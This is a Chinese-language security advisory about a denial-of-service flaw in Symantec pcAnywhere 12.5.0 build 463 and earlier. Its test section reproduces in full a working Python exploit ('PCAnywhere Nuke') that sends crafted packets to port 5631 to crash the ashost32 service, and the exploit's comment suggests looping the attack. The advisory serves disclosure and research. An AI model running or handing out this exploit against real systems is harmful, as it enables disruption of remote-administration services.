Symantec pcAnywhere 12.5.0 build 463及更早版本ashost32服务拒绝服务漏洞

受影响系统:

Symantec pcAnywhere <12.5.0 build 463

描述:


Symantec pcAnywhere是全球最畅销的用于管理服务器和提供管理人员支持的远程控制解决方案。

Windows平台上补丁打的完整的pcAnywhere 12.5.0 build 463及更早版本在实现上存在安全漏洞,未验证的攻击者可利用此漏洞使ashost32服务崩溃,造成拒绝服务。

<*来源:Johnathan Norman

链接:http://pastebin.com/VXkWDM6A
http://www.darkreading.com/advanced-threats/167901091/security/vulnerabilities/232601190/exploit-unleashed-that-crashes-pcanywhere.html
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Johnathan Norman ()提供了如下测试方法:

!/usr/bin/python

”’
Exploit Title:  PCAnywhere Nuke
Date: 2/16/12
Author: Johnathan Norman  spoofy <at> exploitscience.org  or @spoofyroot
Version:  PCAnyWhere  (12.5.0 build 463) and below
Tested on: Windows
Description: The following code will crash the awhost32 service. It’ll be respawned
so if you want to be a real  pain you’ll need to loop this.. my initial impressions
are that controlling execution will be a pain.
”’

import sys
import socket
import argparse

if len(sys.argv) != 2:
print “[+] Usage: ./pcNuke.py <HOST>”
sys.exit(1)
HOST = sys.argv[1]
PORT = 5631
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# HELLO!
s.send(“\x00\x00\x00\x00”)
buf = s.recv(1024)

# ACK!
s.send(“\x6f\x06\xfe”)
buf = s.recv(1024)

# Auth capability part 1
s.send(“\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00”)
# Auth capability part 2
s.send(“\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00”)

建议:


厂商补丁:

Symantec
——–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.symantec.com/business/security_response/

评论关闭。